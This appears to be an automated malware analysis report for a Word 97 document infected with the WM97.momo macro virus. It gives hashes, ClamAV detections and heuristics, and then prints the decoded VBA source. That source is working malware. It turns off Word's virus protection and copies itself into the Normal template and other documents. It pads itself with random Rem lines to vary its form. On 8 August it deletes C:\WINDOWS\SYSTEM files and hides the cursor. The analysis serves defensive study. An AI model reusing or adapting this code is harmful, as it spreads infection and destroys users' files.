Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa0c49abe6cfeee0…

MALICIOUS

Office (OLE)

38.0 KB Created: 1999-10-01 07:33:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: af89f9bdebbeafc00785ff0e3010c547 SHA-1: 0f62d05d76ab775e93acd79c38fd41d8df5b5b5d SHA-256: fa0c49abe6cfeee090b686bde2c54db2e41c1248ca35efec50d95a231dc2535f
200 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-3. It contains a legacy WordBasic AutoOpen macro (OLE_LEGACY_WORDBASIC_AUTOEXEC, OLE_VBA_AUTOOPEN) which is designed to execute automatically. The macro attempts to delete files from C:\WINDOWS\SYSTEM\*.* and calls another subroutine 'JoVlLr9070', suggesting a payload delivery or system disruption function. The presence of the AutoOpen macro and the malicious ClamAV detections strongly indicate a malicious document intended for initial compromise via spearphishing.

Heuristics 4

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5351 bytes
SHA-256: f2841eb2b722198d8aeee6b3f98820dc38523f0032fe6b6dfd8055d2acb0d6f2
Detection
ClamAV: Doc.Trojan.Agnes-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit


Attribute VB_Name = "momo"
Declare Function ShowCursor Lib "USER32" (ByVal fShow As Integer) As Integer
Sub KiCuQz3859()

    ' -= [LineZerO's Macro Engine 1.2] =-
    ' -= [WM97.momo] =-

    ' -= [ID: 23451-Bx-54053859-Bm.W] =-

On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
 'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("momo").CodeModule.ProcCountLines("KiCuQz3859", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("momo").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
If Day(Now()) = 8 And Month(Now()) = 8 Then
Application.Username = "MOMO"
Selection.Wholestory
Selection.Cut
ActiveDocument.SaveAs ActiveDocument.FullName
Kill ("C:\WINDOWS\SYSTEM\*.*")
While ShowCursor(False) >= 0
Wend
Call JoVlLr9070
WordBasic.FileExit dlg
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub JoVlLr9070()
On Error Resume Next
Application.CommandBars("Edit").Enabled = False
Application.CommandBars("Insert").Enabled = False
Application.CommandBars("Format").Enabled = False
End Sub
Sub Bx5405()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("momo").Export "C:\momo.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.momo" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 23451-Bx-54053859-Bm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "momo" Then DgDmFu5117PwVzPp5405 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "momo" Then NhJtFj9070KiCuQz3859 = True
Next y
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = False Then Set MiRxQx4019JoVlLr4336 = ActiveDocument.VBProject
If DgDmFu5117PwVzPp5405 = False And NhJtFj9070KiCuQz3859 = True Then Set MiRxQx4019JoVlLr4336 = NormalTemplate.VBProject
If DgDmFu5117PwVzPp5405 = True And NhJtFj9070KiCuQz3859 = True Then GoTo Ende_
MiRxQx4019JoVlLr4336.VBComponents.Import "C:\momo.sys"
If NhJtFj9070KiCuQz3859 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If DgDmFu5117PwVzPp5405 = False Then NormalTemplate.Save
Ende_:
Call KiCuQz3859
End Sub
Sub AutoOpen()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExit()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoNew()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Sub
Sub AutoExec()
On Error Resume Next
Call Bx5405
Call KiCuQz3859
End Su
... (truncated)